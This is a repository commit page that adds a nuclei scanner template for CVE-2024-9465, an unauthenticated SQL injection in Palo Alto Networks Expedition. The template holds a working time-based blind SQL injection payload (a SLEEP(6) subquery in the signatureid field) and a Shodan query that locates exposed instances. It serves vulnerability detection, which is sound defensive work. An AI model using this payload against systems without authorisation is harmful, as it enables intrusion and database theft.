daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #10973 from projectdiscovery/CVE-2024-9465 

Create CVE-2024-9465.yaml (Palo Alto Expedition - Unauthenticated SQL Injection 🔥 )
patch-12
Ritik Chaddha 2024-10-10 17:26:57 +04:00 committed by GitHub
parent a2513d2474 4f1e260e15
commit 273f1d6ed1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 55 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
http/cves/2024/CVE-2024-9465.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2024-9465
info:
name: Palo Alto Expedition - SQL Injection
author: DhiyaneshDK
severity: medium
description: |
An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
reference:
- https://security.paloaltonetworks.com/PAN-SA-2024-0010
- https://github.com/horizon3ai/CVE-2024-9465/tree/main
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
- https://nvd.nist.gov/vuln/detail/CVE-2024-9465
metadata:
verified: true
max-request: 2
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: cve,cve2024,palo-alto,sqli
flow: http(1) && http(2)
http:
- raw:
- |
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get&type=existing_ruleBases&project=pandbRBAC
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "ruleBasesNames")'
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
condition: and